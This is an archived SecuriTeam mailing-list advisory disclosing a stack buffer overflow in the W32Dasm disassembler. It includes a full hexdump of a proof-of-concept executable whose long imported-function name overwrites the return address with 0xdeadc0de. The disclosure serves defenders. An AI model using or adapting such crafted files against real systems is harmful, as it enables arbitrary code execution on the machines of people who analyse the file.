[NT] W32Dasm Local Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 01/25/05
- Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in MercuryBoard"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 25 Jan 2005 18:48:47 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
W32Dasm Local Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://www.expage.com/page/w32dasm> W32Dasm is "a cool and famous
disassembler/debugger developed by URSoft. It has tons of functions and,
also if it is no longer supported by long time, it is still widely used by
a lot of people".
The program uses the wsprintf() function to copy the name of the
imported/exported functions of the analyzed file into a buffer of only 256
bytes, this allows an attacker to overflow the buffer and cause the
program to execute arbitrary code.
DETAILS
Vulnerable Systems:
* W32Dasm version 8.93 and prior
Exploit:
Exploiting the bug is very simple, all you need is to get an executable
and searching for the name of an imported or exported function to modify.
Luigi has written a very simple proof-of-concept that overwrites the
return address with 0xdeadc0de (
<http://aluigi.altervista.org/poc/w32dasmbof.disasm_me>
http://aluigi.altervista.org/poc/w32dasmbof.disasm_me):
$ hexdump w32dasmbof.disasm_me
0000000 5a4d 0090 0003 0000 0004 0000 ffff 0000
0000010 00b8 0000 0000 0000 0040 0000 0000 0000
0000020 0000 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 0080 0000
0000040 1f0e 0eba b400 cd09 b821 4c01 21cd 6854
0000050 7369 7020 6f72 7267 6d61 6320 6e61 6f6e
0000060 2074 6562 7220 6e75 6920 206e 4f44 2053
0000070 6f6d 6564 0d2e 0a0d 0024 0000 0000 0000
0000080 4550 0000 014c 0003 4a5d 41f5 0000 0000
0000090 0000 0000 00e0 030f 010b 3802 0600 0000
00000a0 0400 0000 0000 0000 1219 0000 1000 0000
00000b0 2000 0000 0000 0040 1000 0000 0200 0000
00000c0 0001 0000 0000 0000 0004 0000 0000 0000
00000d0 4000 0000 0200 0000 ce24 0000 0003 0000
00000e0 0000 0010 1000 0000 0000 0010 1000 0000
00000f0 0000 0000 0010 0000 0000 0000 0000 0000
0000100 3000 0000 013c 0000 0000 0000 0000 0000
0000110 0000 0000 0000 0000 0000 0000 0000 0000
*
0000170 0000 0000 0000 0000 742e 7865 0074 0000
0000180 02dc 0000 1000 0000 0400 0000 0200 0000
0000190 0000 0000 0000 0000 0000 0000 0020 6000
00001a0 642e 7461 0061 0000 0094 0000 2000 0000
00001b0 0200 0000 0600 0000 0000 0000 0000 0000
00001c0 0000 0000 0040 c000 692e 6164 6174 0000
00001d0 013c 0000 3000 0000 0200 0000 0800 0000
00001e0 0000 0000 0000 0000 0000 0000 0060 e000
00001f0 0000 0000 0000 0000 0000 0000 0000 0000
0000200 c031 8b40 244c f704 0441 0006 0000 0f74
0000210 448b 0824 548b 1024 0289 03b8 0000 c300
0000220 5653 8b57 2444 5010 fe6a 0068 4010 6400
0000230 35ff 0000 0000 8964 0025 0000 8b00 2444
0000240 8b20 0858 708b 830c fffe 2074 743b 2424
0000250 1a74 348d 8b76 b30c 4c8b 0824 488b 830c
0000260 b37c 0004 d775 54ff 08b3 d1eb 8f64 0005
0000270 0000 8300 0cc4 5e5f c35b 8955 53e5 5756
0000280 6a55 6a00 6800 1092 0040 75ff e808 020e
0000290 0000 5f5d 5b5e ec89 c35d 55fc e589 ec83
00002a0 5308 5756 8b55 0c5d 458b a308 208c 0040
00002b0 1d89 2090 0040 40f7 0604 0000 0f00 bc85
00002c0 0000 8900 f845 458b 8910 fc45 90a3 4020
00002d0 8d00 f845 4389 8bfc 0c73 7b8b 8308 fffe
00002e0 840f 00a8 0000 0c8d 8376 8f7c 0004 7d74
00002f0 5556 6b8d 8b10 ec45 008b 008b 30a3 4020
0000300 8b00 ec55 028b 34a3 4020 8b00 0442 38a3
0000310 4020 5600 5157 14b9 0000 8d00 3c3d 4020
0000320 8b00 3435 4020 f300 8da5 3c3d 4020 8900
0000330 343d 4020 5900 5e5f 54ff 048f 5e5d 5d8b
0000340 090c 74c0 7828 8b34 087b e853 ff2a ffff
0000350 c483 8d04 106b 5356 c3e8 fffe 83ff 08c4
0000360 0c8d 8b76 8f04 438b ff0c 8f54 8b08 087b
0000370 0c8d 8b76 8f34 62e9 ffff 31ff ebc0 5571
0000380 6b8d 6a10 53ff 95e8 fffe 83ff 0cc4 006a
0000390 05c7 2010 0040 000b 0000 0b6a 2fe8 0001
00003a0 8300 08c4 c009 2175 006a 05c7 2010 0040
00003b0 0008 0000 086a 15e8 0001 8300 08c4 c009
00003c0 0775 01b8 0000 eb00 8327 fff8 2a74 ff50
00003d0 1035 4020 e800 00f6 0000 c483 ff08 1035
00003e0 4020 e800 00dc 0000 c483 b804 0001 0000
00003f0 5f5d 5b5e ec89 c35d 3d83 202c 0040 7500
0000400 b807 0001 0000 e8eb 2ca1 4020 6a00 ff0b
0000410 58e0 01b8 0000 eb00 64d7 00a1 0000 5500
0000420 e589 ff6a 1c68 4020 6800 109a 0040 6450
0000430 2589 0000 0000 ec83 5310 5756 6589 50e8
0000440 3cd9 6624 0c81 0024 d903 242c c483 6a04
0000450 6a00 6800 2028 0040 2468 4020 6800 2020
0000460 0040 45e8 0000 ff00 2835 4020 ff00 2435
0000470 4020 ff00 2035 4020 8900 1425 4020 e800
0000480 0018 0000 c483 3118 89c9 fc4d e850 0026
0000490 0000 c3c9 a364 0000 0000 00c3 c031 90c3
00004a0 25ff 30b4 0040 9090 0000 0000 25ff 30c0
00004b0 0040 9090 0000 0000 25ff 30c4 0040 9090
00004c0 0000 0000 25ff 30c8 0040 9090 0000 0000
00004d0 25ff 30cc 0040 9090 0000 0000 0000 0000
00004e0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000600 2000 0040 2000 0040 8000 0000 0000 0000
0000610 0000 0000 0000 0000 0000 0000 0000 0000
*
0000800 3090 0000 0000 0000 0000 0000 310c 0000
0000810 30b4 0000 309c 0000 0000 0000 0000 0000
0000820 3120 0000 30c0 0000 0000 0000 0000 0000
0000830 0000 0000 0000 0000 0000 0000 0000 0000
*
0000890 30d4 0000 0000 0000 0000 0000 30e0 0000
00008a0 30f0 0000 30f8 0000 3100 0000 0000 0000
00008b0 0000 0000 30d4 0000 0000 0000 0000 0000
00008c0 30e0 0000 30f0 0000 30f8 0000 3100 0000
00008d0 0000 0000 0278 6161 6161 6161 6161 6161
00008e0 6161 6161 6161 6161 6161 6161 6161 6161
*
00009d0 6161 6161 6161 c0de dead 0000 0000 0000
00009e0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000a00
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/w32dasmbof-adv.txt>
http://aluigi.altervista.org/adv/w32dasmbof-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in MercuryBoard"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes
a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam
mailing list. ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [EXPL] TinyWeb Server DoS Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The information in this
bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be
liable for any damages whatsoever including direct, indirect, incidental, consequential, loss
of business profits or special damages. ... (Securiteam) - [EXPL] 3Com FTP Server Buffer Overflow (CD)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing
of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty
of any kind. ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [TOOL] Automagic SQL Injector
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector
is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided
"AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [NT] sHTTP FTPServer Directory Traversal
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The FTP server support of Small
HTTP server contains a directory traversal ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam)
